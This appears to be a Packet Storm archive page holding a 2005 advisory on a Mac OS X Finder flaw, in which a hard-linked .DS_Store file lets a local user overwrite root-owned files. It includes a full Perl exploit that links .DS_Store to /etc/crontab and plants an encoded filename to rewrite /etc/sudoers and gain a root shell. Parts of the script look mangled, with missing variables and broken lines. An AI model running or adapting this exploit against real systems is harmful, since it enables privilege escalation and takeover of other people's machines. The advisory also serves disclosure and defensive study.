what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Feb 22, 2005
Authored by vade79

The Finder utility that Mac OSX uses to launch and manipulate files and applications fails to check for hard linked files before performing changes. This allows an unprivileged user the ability to overwrite files as root. Full exploit included.

tags | exploit, root
systems | apple
SHA-256 | 607bf00b82581926e1ae755d2297dd135f36f47351d4a9b69559b86cf1ab5d89


Change Mirror Download

HEADER: [OSX Finder] DS_Store arbitrary file overwrite vulnerability.

CONTACT: vade79 -> v9@fakehalo.us (fakehalo/realhalo)

CATEGORY: Local with user intervention.

IMPACT: Privilege escalation.

REFERENCE: http://fakehalo.us/xfinder-ds.pl


The Finder is the application that Mac OS X and earlier versions of the
operating system use to launch and manipulate files and applications. The
Finder handles all common tasks such as creating, deleting, moving, and
copying files and folders. It is, in effect, the window into the Mac OS X
operating system.

Unlike other tools and utilities, the Finder is always active and is
automatically launched immediately after logging in to the system. Much
of the Macintosh's legendary ease of use is attributed to the Finder and
its intuitive interface to the file system.


The Finder utility is prone to a local vulnerability whereby a
(non-privileged) user can create an environment that can cause other users
(including root) to unknowingly arbitrarily overwrite files with (some)
leverage in the content of the data.

The vulnerability exists due to the lack of checking (hard) links with the
.DS_Store file placed in each directory by Finder. The .DS_Store file
contains attributes about the directory along with the names of the files.
If a user has the ability to place a .DS_Store file in a directory, they
can (hard) link it to a file of there choice. Then, the user that attempts
to modify the directory (most ways) in Finder, if they have permission,
will write the (new) attributes to the file it has been linked to.


A theoretical example of this would be to go to (or make) a directory you
have access to write to and (hard) link .DS_Store to /etc/passwd(ie.
"ln /etc/passwd .DS_Store"). Then, when and if the user (which must be
root in this case) attempts to modify almost any attribute in the
directory via Finder it will write the changes over /etc/passwd.

Generally the data stored to .DS_Store is not readable, and would only
corrupt a file linked to it. However, any files or subdirectories in the
directory will be written to the .DS_Store file in unicode(utf8 encoded).
This gains some leverage to attack on two levels; you can use any
character you want("/"'s would be restricted otherwise), and the data
contained in the filename won't appear as common text since it is in
unicode/utf8--it will appear as random japanese-like characters usually.


The following demonstrational exploit is intended for root user
intervention. However, the same method (not the same files used to
overwrite) can be used to gain access to other user accounts.

--- xfinder-ds.pl: start ---

# [OSX Finder] DS_Store arbitrary file overwrite exploit. (root version)
# vade79 -> v9@fakehalo.us (fakehalo/realhalo)
# this will create a directory called "xfinder" in your home directory,
# once the root user has modified that directory using Finder in almost any
# way(such as copying a file out of it, etc) it will write to the .DS_Store
# file in that directory. the data written to the .DS_Store file will
# consist of the filenames/subdirectories making up the directory and the
# attributes of the directory.
# this exploit works by linking the .DS_Store file to /etc/crontab, and
# creating a special unicode(utf8 encoded) file in the directory. the file
# created in unicode is equal to(in ASCII):
# '\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n'
# this file will display as a japanese-like series of characters and
# is (part of) what is written to the .DS_Store file, which allows for
# the privilege escalation. once this line has been written to
# /etc/crontab(along with other .DS_Store data), crontab will overwrite
# /etc/sudoers with "ALL ALL=(ALL) ALL" and you can then sudo to root.
# note: this is done through crontab->sudo because sudo will complain
# of the .DS_Store garbage data in the /etc/sudoers file and exit,
# whereas crontab will ignore it.
# (sorry for the squished/ugly script, just a precaution for
# wordwrapping)

use encoding utf8;
sub pexit{print("[!] @_.\n");exit(1);}
print("[OSX Finder] DS_Store arbitrary file overwrite exploit.\n\n");
pexit("/etc/crontab and /etc/sudoers are required for this to work");
mkdir($testdir)||pexit("Could make the directory \"$testdir\", " .
"make sure it doesn't already exist");
chdir($testdir)||pexit("Could change the directory to \"$testdir\"");
# = "\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n"
open(TOUCH,">" . Encode::encode_utf8(
"\x{0a0a}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{726f}\x{6f74}" .
"\x{2065}\x{6368}\x{6f20}\x{2241}\x{4c4c}\x{2041}\x{4c4c}\x{3d28}" .
"\x{414c}\x{4c29}\x{2041}\x{4c4c}\x{223e}\x{2f65}\x{7463}\x{2f73}" .
"\x{7564}\x{6f65}\x{7273}\x{0a0a}"))||pexit("Could not create " .
"unicode/utf8 encoded filename");
link("/etc/crontab",".DS_Store")||pexit("Could link .DS_Store " .
"to /etc/crontab");
print("[+] Waiting for root user to modify \"$testdir\" with " .
print("[?] (CTRL-C if desired, this script does not need to be " .
"running to work)\n");
print("[+] /etc/crontab has been modified.\n");
print("[+] Waiting for crontab to change /etc/sudoers...\n");
print("[+] /etc/sudoers has been modified.\n");
print("[+] Attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");

--- xfinder-ds.pl: end ---


* Soft/symbolic links will not work with this vulnerability, they must be
hard links.
* Filenames and subdirectories are written in unicode(utf8 encoded) to the
.DS_Store file by Finder.
* Even if the filename in the directory that contains the arbitrary data is
deleted, it will be placed into the .DS_Store file.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By